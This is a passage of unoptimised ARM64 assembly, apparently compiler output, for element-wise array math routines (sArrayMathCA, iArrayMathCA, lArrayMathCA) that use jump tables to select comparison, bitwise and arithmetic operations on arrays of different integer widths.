ldr x9, [sp, #40]
ldrsb w9, [x9]
subs w8, w8, w9
cset w8, lt
and w8, w8, #0x1
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
subs w8, w8, w9
cset w8, gt
and w8, w8, #0x1
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_8: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
subs w8, w8, w9
cset w8, le
and w8, w8, #0x1
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_9: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
subs w8, w8, w9
cset w8, ge
and w8, w8, #0x1
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_10: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_12
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #40]
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
and w8, w8, #0x1
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_13: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
subs w8, w8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_15
b LBB0_14
LBB0_14: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #40]
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
and w8, w8, #0x1
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_16: ; in Loop: Header=BB0_1 Depth=1
ldrb w8, [sp, #55]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_17: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
lsl w8, w8, w9
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_18: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
asr w8, w8, w9
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_19: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
and w8, w8, w9
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_20: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
orr w8, w8, w9
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_21: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
eor w8, w8, w9
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_22: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
mvn w8, w8
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_23: ; in Loop: Header=BB0_1 Depth=1
ldrb w8, [sp, #55]
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_24: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
add w8, w8, w9
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_25: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
subs w8, w8, w9
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_26: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
mul w8, w8, w9
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_27: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w9, [x9]
sdiv w8, w8, w9
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_28: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
ldr x9, [sp, #40]
ldrsb w10, [x9]
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_29: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
add w8, w8, #1
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_30: ; in Loop: Header=BB0_1 Depth=1
ldrsb w8, [sp, #55]
subs w8, w8, #1
ldr x9, [sp, #56]
strb w8, [x9]
b LBB0_32
LBB0_31:
b LBB0_33
LBB0_32: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #56]
add x8, x8, #1
str x8, [sp, #56]
ldr x8, [sp, #40]
add x8, x8, #1
str x8, [sp, #40]
b LBB0_1
LBB0_33:
add sp, sp, #64
ret
.cfi_endproc
.p2align 2
lJTI0_0:
.long LBB0_4-Ltmp1
.long LBB0_5-Ltmp1
.long LBB0_6-Ltmp1
.long LBB0_7-Ltmp1
.long LBB0_8-Ltmp1
.long LBB0_9-Ltmp1
.long LBB0_10-Ltmp1
.long LBB0_13-Ltmp1
.long LBB0_16-Ltmp1
.long LBB0_17-Ltmp1
.long LBB0_18-Ltmp1
.long LBB0_19-Ltmp1
.long LBB0_20-Ltmp1
.long LBB0_21-Ltmp1
.long LBB0_22-Ltmp1
.long LBB0_23-Ltmp1
.long LBB0_24-Ltmp1
.long LBB0_25-Ltmp1
.long LBB0_26-Ltmp1
.long LBB0_27-Ltmp1
.long LBB0_28-Ltmp1
.long LBB0_29-Ltmp1
.long LBB0_30-Ltmp1
; -- End function
.globl _sArrayMathCA ; -- Begin function sArrayMathCA
.p2align 2
_sArrayMathCA: ; @sArrayMathCA
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
str x0, [sp, #56]
strh w1, [sp, #54]
str x2, [sp, #40]
str x3, [sp, #32]
strb w4, [sp, #31]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #32]
subs x9, x8, #1
str x9, [sp, #32]
subs x8, x8, #0
cset w8, ls
tbnz w8, #0, LBB1_33
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldrb w8, [sp, #31]
subs w8, w8, #0
; kill: def $x8 killed $w8
str x8, [sp, #16] ; 8-byte Folded Spill
subs x8, x8, #22
cset w8, hi
tbnz w8, #0, LBB1_31
; %bb.3: ; in Loop: Header=BB1_1 Depth=1
ldr x11, [sp, #16] ; 8-byte Folded Reload
adrp x10, lJTI1_0@PAGE
add x10, x10, lJTI1_0@PAGEOFF
Ltmp3:
adr x8, Ltmp3
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB1_4: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
subs w8, w8, w9
cset w8, eq
and w8, w8, #0x1
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_5: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
subs w8, w8, w9
cset w8, ne
and w8, w8, #0x1
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_6: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
subs w8, w8, w9
cset w8, lt
and w8, w8, #0x1
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_7: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
subs w8, w8, w9
cset w8, gt
and w8, w8, #0x1
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_8: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
subs w8, w8, w9
cset w8, le
and w8, w8, #0x1
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_9: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
subs w8, w8, w9
cset w8, ge
and w8, w8, #0x1
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_10: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_12
b LBB1_11
LBB1_11: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #40]
ldrsh w8, [x8]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB1_12
LBB1_12: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
and w8, w8, #0x1
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_13: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
subs w8, w8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_15
b LBB1_14
LBB1_14: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #40]
ldrsh w8, [x8]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB1_15
LBB1_15: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
and w8, w8, #0x1
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_16: ; in Loop: Header=BB1_1 Depth=1
ldrh w8, [sp, #54]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_17: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
lsl w8, w8, w9
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_18: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
asr w8, w8, w9
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_19: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
and w8, w8, w9
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_20: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
orr w8, w8, w9
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_21: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
eor w8, w8, w9
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_22: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
mvn w8, w8
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_23: ; in Loop: Header=BB1_1 Depth=1
ldrh w8, [sp, #54]
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_24: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
add w8, w8, w9
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_25: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
subs w8, w8, w9
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_26: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
mul w8, w8, w9
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_27: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w9, [x9]
sdiv w8, w8, w9
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_28: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
ldr x9, [sp, #40]
ldrsh w10, [x9]
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_29: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
add w8, w8, #1
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_30: ; in Loop: Header=BB1_1 Depth=1
ldrsh w8, [sp, #54]
subs w8, w8, #1
ldr x9, [sp, #56]
strh w8, [x9]
b LBB1_32
LBB1_31:
b LBB1_33
LBB1_32: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #56]
add x8, x8, #2
str x8, [sp, #56]
ldr x8, [sp, #40]
add x8, x8, #2
str x8, [sp, #40]
b LBB1_1
LBB1_33:
add sp, sp, #64
ret
.cfi_endproc
.p2align 2
lJTI1_0:
.long LBB1_4-Ltmp3
.long LBB1_5-Ltmp3
.long LBB1_6-Ltmp3
.long LBB1_7-Ltmp3
.long LBB1_8-Ltmp3
.long LBB1_9-Ltmp3
.long LBB1_10-Ltmp3
.long LBB1_13-Ltmp3
.long LBB1_16-Ltmp3
.long LBB1_17-Ltmp3
.long LBB1_18-Ltmp3
.long LBB1_19-Ltmp3
.long LBB1_20-Ltmp3
.long LBB1_21-Ltmp3
.long LBB1_22-Ltmp3
.long LBB1_23-Ltmp3
.long LBB1_24-Ltmp3
.long LBB1_25-Ltmp3
.long LBB1_26-Ltmp3
.long LBB1_27-Ltmp3
.long LBB1_28-Ltmp3
.long LBB1_29-Ltmp3
.long LBB1_30-Ltmp3
; -- End function
.globl _iArrayMathCA ; -- Begin function iArrayMathCA
.p2align 2
_iArrayMathCA: ; @iArrayMathCA
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
str x0, [sp, #56]
str w1, [sp, #52]
str x2, [sp, #40]
str x3, [sp, #32]
strb w4, [sp, #31]
b LBB2_1
LBB2_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #32]
subs x9, x8, #1
str x9, [sp, #32]
subs x8, x8, #0
cset w8, ls
tbnz w8, #0, LBB2_33
b LBB2_2
LBB2_2: ; in Loop: Header=BB2_1 Depth=1
ldrb w8, [sp, #31]
subs w8, w8, #0
; kill: def $x8 killed $w8
str x8, [sp, #16] ; 8-byte Folded Spill
subs x8, x8, #22
cset w8, hi
tbnz w8, #0, LBB2_31
; %bb.3: ; in Loop: Header=BB2_1 Depth=1
ldr x11, [sp, #16] ; 8-byte Folded Reload
adrp x10, lJTI2_0@PAGE
add x10, x10, lJTI2_0@PAGEOFF
Ltmp5:
adr x8, Ltmp5
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB2_4: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
and w8, w8, #0x1
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_5: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
and w8, w8, #0x1
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_6: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
subs w8, w8, w9
cset w8, lt
and w8, w8, #0x1
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_7: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
and w8, w8, #0x1
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_8: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
subs w8, w8, w9
cset w8, le
and w8, w8, #0x1
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_9: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
and w8, w8, #0x1
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_10: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB2_12
b LBB2_11
LBB2_11: ; in Loop: Header=BB2_1 Depth=1
ldr x8, [sp, #40]
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB2_12
LBB2_12: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
and w8, w8, #0x1
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_13: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
subs w8, w8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB2_15
b LBB2_14
LBB2_14: ; in Loop: Header=BB2_1 Depth=1
ldr x8, [sp, #40]
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB2_15
LBB2_15: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
and w8, w8, #0x1
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_16: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
subs w8, w8, #0
cset w8, eq
and w8, w8, #0x1
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_17: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
lsl w8, w8, w9
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_18: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
asr w8, w8, w9
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_19: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
and w8, w8, w9
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_20: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
orr w8, w8, w9
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_21: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
eor w8, w8, w9
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_22: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
mvn w8, w8
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_23: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_24: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
add w8, w8, w9
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_25: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
subs w8, w8, w9
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_26: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
mul w8, w8, w9
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_27: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w9, [x9]
sdiv w8, w8, w9
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_28: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
ldr x9, [sp, #40]
ldr w10, [x9]
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_29: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
add w8, w8, #1
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_30: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #52]
subs w8, w8, #1
ldr x9, [sp, #56]
str w8, [x9]
b LBB2_32
LBB2_31:
b LBB2_33
LBB2_32: ; in Loop: Header=BB2_1 Depth=1
ldr x8, [sp, #56]
add x8, x8, #4
str x8, [sp, #56]
ldr x8, [sp, #40]
add x8, x8, #4
str x8, [sp, #40]
b LBB2_1
LBB2_33:
add sp, sp, #64
ret
.cfi_endproc
.p2align 2
lJTI2_0:
.long LBB2_4-Ltmp5
.long LBB2_5-Ltmp5
.long LBB2_6-Ltmp5
.long LBB2_7-Ltmp5
.long LBB2_8-Ltmp5
.long LBB2_9-Ltmp5
.long LBB2_10-Ltmp5
.long LBB2_13-Ltmp5
.long LBB2_16-Ltmp5
.long LBB2_17-Ltmp5
.long LBB2_18-Ltmp5
.long LBB2_19-Ltmp5
.long LBB2_20-Ltmp5
.long LBB2_21-Ltmp5
.long LBB2_22-Ltmp5
.long LBB2_23-Ltmp5
.long LBB2_24-Ltmp5
.long LBB2_25-Ltmp5
.long LBB2_26-Ltmp5
.long LBB2_27-Ltmp5
.long LBB2_28-Ltmp5
.long LBB2_29-Ltmp5
.long LBB2_30-Ltmp5
; -- End function
.globl _lArrayMathCA ; -- Begin function lArrayMathCA
.p2align 2
_lArrayMathCA: ; @lArrayMathCA
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
str x0, [sp, #56]
str x1, [sp, #48]
str x2, [sp, #40]
str x3, [sp, #32]
strb w4, [sp, #31]
b LBB3_1
LBB3_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #32]
subs x9, x8, #1
str x9, [sp, #32]
subs x8, x8, #0
cset w8, ls
tbnz w8, #0, LBB3_33
b LBB3_2
LBB3_2: ; in Loop: Header=BB3_1 Depth=1
ldrb w8, [sp, #31]
subs w8, w8, #0
; kill: def $x8 killed $w8
str x8, [sp, #16] ; 8-byte Folded Spill
subs x8, x8, #22
cset w8, hi
tbnz w8, #0, LBB3_31
; %bb.3: ; in Loop: Header=BB3_1 Depth=1
ldr x11, [sp, #16] ; 8-byte Folded Reload
adrp x10, lJTI3_0@PAGE
add x10, x10, lJTI3_0@PAGEOFF
Ltmp7:
adr x8, Ltmp7
ldrsw x9, [x10, x11, lsl #2]
add x8, x8, x9
br x8
LBB3_4: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
subs x8, x8, x9
cset w9, eq
; implicit-def: $x8
mov x8, x9
and x8, x8, #0x1
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_5: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
subs x8, x8, x9
cset w9, ne
; implicit-def: $x8
mov x8, x9
and x8, x8, #0x1
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_6: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
subs x8, x8, x9
cset w9, lt
; implicit-def: $x8
mov x8, x9
and x8, x8, #0x1
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_7: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
subs x8, x8, x9
cset w9, gt
; implicit-def: $x8
mov x8, x9
and x8, x8, #0x1
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_8: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
subs x8, x8, x9
cset w9, le
; implicit-def: $x8
mov x8, x9
and x8, x8, #0x1
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_9: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
subs x8, x8, x9
cset w9, ge
; implicit-def: $x8
mov x8, x9
and x8, x8, #0x1
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_10: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
subs x8, x8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB3_12
b LBB3_11
LBB3_11: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #40]
ldr x8, [x8]
subs x8, x8, #0
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB3_12
LBB3_12: ; in Loop: Header=BB3_1 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
and x8, x8, #0x1
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_13: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
subs x8, x8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB3_15
b LBB3_14
LBB3_14: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #40]
ldr x8, [x8]
subs x8, x8, #0
cset w8, ne
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB3_15
LBB3_15: ; in Loop: Header=BB3_1 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
and x8, x8, #0x1
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_16: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
subs x8, x8, #0
cset w9, eq
; implicit-def: $x8
mov x8, x9
and x8, x8, #0x1
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_17: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
lsl x8, x8, x9
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_18: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
asr x8, x8, x9
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_19: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
and x8, x8, x9
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_20: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
orr x8, x8, x9
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_21: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
eor x8, x8, x9
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_22: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
mvn x8, x8
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_23: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_24: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
add x8, x8, x9
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_25: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
subs x8, x8, x9
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_26: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
mul x8, x8, x9
ldr x9, [sp, #56]
str x8, [x9]
b LBB3_32
LBB3_27: ; in Loop: Header=BB3_1 Depth=1
ldr x8, [sp, #48]
ldr x9, [sp, #40]
ldr x9, [x9]
sdiv x8, x8, x9
